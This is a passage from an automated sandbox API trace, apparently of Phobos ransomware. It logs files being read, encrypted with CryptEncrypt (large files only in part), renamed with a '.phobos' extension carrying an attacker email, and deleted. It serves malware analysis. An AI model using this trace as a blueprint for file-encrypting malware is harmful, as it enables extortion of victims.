(hObject=0x140) returned 1 [0157.602] CloseHandle (hObject=0x14c) returned 1 [0157.602] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi")) returned 1 [0157.609] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0157.609] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0157.657] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=174440) returned 1 [0157.657] CloseHandle (hObject=0x18c) returned 1 [0157.657] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 0x2020 [0157.657] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0157.657] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0157.657] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0157.657] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0157.658] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0157.658] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32de8) returned 1 [0157.658] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0157.658] ReadFile (in: hFile=0x18c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x2a968, lpOverlapped=0x0) returned 1 [0158.177] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x2a970, dwBufLen=0x2a970 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x2a970) returned 1 [0158.178] WriteFile (in: hFile=0x180, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x2a970, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x2a970, lpOverlapped=0x0) returned 1 [0158.181] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c28) returned 1 [0158.181] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0158.181] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x30, dwBufLen=0x30 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x30) returned 1 [0158.181] CryptDestroyKey (hKey=0xa32c28) returned 1 [0158.181] WriteFile (in: hFile=0x180, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xe2, lpOverlapped=0x0) returned 1 [0158.181] CryptDestroyKey (hKey=0xa32de8) returned 1 [0158.181] CloseHandle (hObject=0x18c) returned 1 [0158.181] CloseHandle (hObject=0x180) returned 1 [0158.181] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe")) returned 1 [0158.183] SetEvent (hEvent=0xe8) returned 1 [0158.183] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0158.183] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0158.195] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=7378792) returned 1 [0158.195] CloseHandle (hObject=0x180) returned 1 [0158.195] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll")) returned 0x2020 [0158.195] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0158.196] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0158.196] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0158.196] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0158.196] ReadFile (in: hFile=0x180, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0158.222] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0158.222] ReadFile (in: hFile=0x180, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0158.271] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0158.271] ReadFile (in: hFile=0x180, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0158.297] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa32ca8) returned 1 [0158.298] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0158.298] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0050) returned 1 [0158.344] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0158.344] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0158.344] WriteFile (in: hFile=0x180, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0102, lpOverlapped=0x0) returned 1 [0158.599] SetEndOfFile (hFile=0x180) returned 1 [0158.599] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0158.599] WriteFile (in: hFile=0x180, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0158.600] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0158.600] WriteFile (in: hFile=0x180, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0158.602] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0158.602] WriteFile (in: hFile=0x180, lpBuffer=0x301013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301013a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0158.608] CloseHandle (hObject=0x180) returned 1 [0158.609] SetEvent (hEvent=0xe8) returned 1 [0158.609] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0158.609] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0158.609] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1463568) returned 1 [0158.609] CloseHandle (hObject=0x180) returned 1 [0158.609] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 0x2020 [0158.609] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0158.609] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0158.609] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0158.610] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0158.610] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0158.610] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ca8) returned 1 [0158.610] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0158.610] ReadFile (in: hFile=0x180, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x110100, lpOverlapped=0x0) returned 1 [0159.151] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110100, dwBufLen=0x110100 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110100) returned 1 [0159.158] WriteFile (in: hFile=0x148, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x110100, lpOverlapped=0x0) returned 1 [0159.236] ReadFile (in: hFile=0x180, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x55410, lpOverlapped=0x0) returned 1 [0159.290] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x55420, dwBufLen=0x55420 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x55420) returned 1 [0159.293] WriteFile (in: hFile=0x148, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x55420, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x55420, lpOverlapped=0x0) returned 1 [0159.297] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32968) returned 1 [0159.297] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0159.297] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0159.297] CryptDestroyKey (hKey=0xa32968) returned 1 [0159.297] WriteFile (in: hFile=0x148, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0159.297] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0159.297] CloseHandle (hObject=0x180) returned 1 [0159.297] CloseHandle (hObject=0x148) returned 1 [0159.297] DeleteFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 1 [0159.301] SetEvent (hEvent=0xe8) returned 1 [0159.302] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0159.302] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0159.302] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=27532288) returned 1 [0159.302] CloseHandle (hObject=0x180) returned 1 [0159.302] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi")) returned 0x2020 [0159.302] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0159.303] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPlusrWW.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proplusrww.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0159.303] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0159.303] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0159.303] ReadFile (in: hFile=0x180, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0159.371] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x8c0955, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0159.371] ReadFile (in: hFile=0x180, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0159.801] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x1a01c00, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0159.802] ReadFile (in: hFile=0x180, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0159.827] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa327e8) returned 1 [0159.827] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0159.828] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060, dwBufLen=0xc0060 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0060) returned 1 [0159.834] CryptDestroyKey (hKey=0xa327e8) returned 1 [0159.834] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0159.834] WriteFile (in: hFile=0x180, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0112, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0112, lpOverlapped=0x0) returned 1 [0159.848] SetEndOfFile (hFile=0x180) returned 1 [0159.848] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x1a01c00, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0159.848] WriteFile (in: hFile=0x180, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0159.849] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x8c0955, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0159.850] WriteFile (in: hFile=0x180, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0159.853] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0159.853] WriteFile (in: hFile=0x180, lpBuffer=0x301014a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301014a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0159.854] CloseHandle (hObject=0x180) returned 1 [0159.854] SetEvent (hEvent=0xe8) returned 1 [0159.854] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0159.854] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0159.854] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=222948913) returned 1 [0159.854] CloseHandle (hObject=0x180) returned 1 [0159.854] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab")) returned 0x2020 [0159.854] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0159.855] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0159.855] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0159.855] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0159.855] ReadFile (in: hFile=0x180, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0160.224] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x46dfa10, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0160.224] ReadFile (in: hFile=0x180, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0160.634] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xd45ee31, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0160.635] 